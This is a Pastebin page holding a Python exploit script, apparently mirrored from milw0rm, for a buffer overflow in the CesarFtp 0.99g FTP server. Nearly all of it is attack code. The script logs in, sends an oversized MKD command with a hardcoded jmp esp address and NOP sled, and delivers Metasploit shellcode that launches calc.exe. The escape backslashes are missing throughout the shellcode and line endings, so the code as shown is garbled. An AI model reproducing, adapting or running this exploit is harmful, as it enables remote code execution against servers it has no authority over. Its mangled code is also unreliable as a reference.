Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- #CesarFtp 0.99g 0day Exploit
- #Proof of Concept: execute calc.exe
- #Tested on XP sp2 polish
- #Bug found by h07 [h07@interia.pl]
- #Date: 10.06.2006
- from socket import *
- shellcode = ( #execute calc.exe <metasploit.com>
- "x31xc9x83xe9xdbxd9xeexd9x74x24xf4x5bx81x73x13xd8"
- "x22x72xe4x83xebxfcxe2xf4x24xcax34xe4xd8x22xf9xa1"
- "xe4xa9x0exe1xa0x23x9dx6fx97x3axf9xbbxf8x23x99x07"
- "xf6x6bxf9xd0x53x23x9cxd5x18xbbxdex60x18x56x75x25"
- "x12x2fx73x26x33xd6x49xb0xfcx26x07x07x53x7dx56xe5"
- "x33x44xf9xe8x93xa9x2dxf8xd9xc9xf9xf8x53x23x99x6d"
- "x84x06x76x27xe9xe2x16x6fx98x12xf7x24xa0x2dxf9xa4"
- "xd4xa9x02xf8x75xa9x1axecx31x29x72xe4xd8xa9x32xd0"
- "xddx5ex72xe4xd8xa9x1axd8x87x13x84x84x8exc9x7fx8c"
- "x28xa8x76xbbxb0xbax8cx6exd6x75x8dx03x30xccx8dx1b"
- "x27x41x13x88xbbx0cx17x9cxbdx22x72xe4")
- def intel_order(i):
- a = chr(i % 256)
- i = i >> 8
- b = chr(i % 256)
- i = i >> 8
- c = chr(i % 256)
- i = i >> 8
- d = chr(i % 256)
- str = "%c%c%c%c" % (a, b, c, d)
- return str
- host = "192.168.0.1"
- port = 21
- user = "ftp"
- password = "ftp"
- EIP = 0x773D10A4 #jmp esp <shell32.dll XP professional sp2 english>
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((host, port))
- print s.recv(1024)
- s.send("user %srn" % (user))
- print s.recv(1024)
- s.send("pass %srn" % (password))
- print s.recv(1024)
- buffer = "MKD "
- buffer += "n" * 671
- buffer += "A" * 3 + intel_order(EIP)
- buffer += "x90" * 40 + shellcode
- buffer += "rn"
- print "len: %d" % (len(buffer))
- s.send(buffer)
- print s.recv(1024)
- s.close()
- #EoF
- # milw0rm.com [2006-06-12]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement